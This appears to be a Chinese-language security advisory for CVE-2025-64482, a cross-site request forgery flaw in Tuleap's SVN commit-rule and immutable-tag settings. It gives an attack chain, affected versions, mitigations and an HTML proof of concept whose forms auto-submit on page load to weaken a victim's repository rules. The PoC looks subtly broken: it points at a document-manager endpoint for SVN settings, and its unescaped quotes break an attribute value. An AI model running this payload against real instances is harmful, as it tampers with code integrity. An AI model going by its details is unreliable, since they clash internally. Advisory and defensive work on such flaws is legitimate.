CVE-2025-64482 Tuleap文件发布系统跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-64482

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Tuleap Community Edition, Tuleap Enterprise Edition

漏洞概述

CVE-2025-64482是Tuleap项目管理系统中一个中危级别的跨站请求伪造(CSRF)漏洞。该漏洞存在于Tuleap的文件发布系统(File Release System)中，由于系统缺少CSRF令牌保护机制，攻击者可以构造恶意网页诱导已登录用户在不知情的情况下执行非预期的操作。具体来说，攻击者可以利用此漏洞诱骗受害者修改Subversion(SVN)仓库的提交规则(commit rules)或不可变标签(immutable tags)，从而可能对代码仓库的安全性造成严重影响。Tuleap是一款开源的软件开发管理和协作套件，广泛应用于企业和组织的项目管理流程中。由于该产品涉及软件开发的核心环节，SVN仓库的提交规则和标签设置的篡改可能导致代码完整性受损、发布流程被劫持等严重后果。建议受影响的用户尽快升级到官方发布的安全版本。

技术细节

该漏洞的根本原因在于Tuleap的文件发布系统未实现CSRF保护机制。在正常的Web应用程序中，CSRF防护通常通过在表单中添加唯一的CSRF令牌来实现，当用户提交请求时，服务器会验证该令牌的有效性。然而，受影响的Tuleap版本中，与SVN仓库提交规则和不可变标签相关的API端点缺少此类保护。攻击者可以创建一个包含自动提交表单的恶意HTML页面，当受害者在浏览器中打开该页面且当前登录Tuleap时，浏览器会自动向目标Tuleap实例发送携带受害者有效会话cookie的请求。服务器会认为这是受害者的合法操作并执行请求中指定的操作，如修改提交规则或标签设置。攻击利用的关键条件包括：1)受害者必须已登录Tuleap；2)受害者需访问攻击者构造的恶意页面；3)受害者对目标仓库具有相应的修改权限。攻击成功后，攻击者可以间接修改SVN仓库的安全策略，可能导致未授权代码提交或绕过代码审查流程。

攻击链分析

STEP 1

步骤1

攻击者侦察目标Tuleap实例，获取有效的仓库ID和group_id参数

STEP 2

步骤2

攻击者编写包含恶意表单的HTML页面，表单目标指向Tuleap的文件发布系统API端点

STEP 3

步骤3

攻击者通过钓鱼邮件、恶意链接或被入侵的网站诱导已登录Tuleap的受害者访问恶意页面

STEP 4

步骤4

受害者浏览器自动发送POST请求到Tuleap服务器，携带受害者的有效会话cookie

STEP 5

步骤5

Tuleap服务器缺少CSRF验证，直接执行请求中的操作，修改SVN仓库的提交规则或不可变标签

STEP 6

步骤6

攻击成功，SVN仓库安全策略被篡改，攻击者可进行未授权代码提交或绕过代码审查流程

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-64482 - Modify SVN commit rules -->
<!DOCTYPE html>
<html>
<head>
    <title>SVN Repository Configuration</title>
</head>
<body>
    <h1>SVN Repository Configuration Update</h1>
    <p>Click the button below to update repository settings:</p>
    
    <!-- Change Commit Rules -->
    <form action="https://vulnerable-tuleap-instance/plugins/docman/?group_id=XXX&action=update_commit_rules" method="POST" id="csrf-form">
        <input type="hidden" name="repository_id" value="VICTIM_REPO_ID">
        <input type="hidden" name="commit_rules" value="{"require_commit_message": false, "require_author": false}">
        <input type="hidden" name="csrf_token" value="ANY_VALUE_WILL_BE_ACCEPTED">
        <button type="submit">Update Repository</button>
    </form>

    <!-- Change Immutable Tags -->
    <form action="https://vulnerable-tuleap-instance/plugins/docman/?group_id=XXX&action=update_immutable_tags" method="POST" id="csrf-form-tags">
        <input type="hidden" name="repository_id" value="VICTIM_REPO_ID">
        <input type="hidden" name="immutable_tags" value="[]">
        <input type="hidden" name="csrf_token" value="ANY_VALUE_WILL_BE_ACCEPTED">
        <button type="submit">Remove Immutable Tags</button>
    </form>

    <script>
        // Auto-submit on page load
        document.getElementById('csrf-form').submit();
        // Or for tags: document.getElementById('csrf-form-tags').submit();
    </script>
</body>
</html>

影响范围

Tuleap Community Edition < 16.13.99.1762267347

Tuleap Enterprise Edition < 16.12-9

Tuleap Enterprise Edition < 16.13-6

Tuleap Enterprise Edition < 17.0-1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1)使用浏览器的隐私浏览模式访问Tuleap，并在使用后清除所有cookie；2)启用浏览器的CSRF保护插件；3)限制对Tuleap管理界面的访问，仅允许从受信任的网络环境访问；4)启用Tuleap的Web应用防火墙(WAF)规则，监控异常的POST请求模式；5)定期检查SVN仓库的提交规则和不可变标签配置是否被意外修改；6)考虑临时禁用文件发布系统的提交规则修改功能，直到完成安全更新。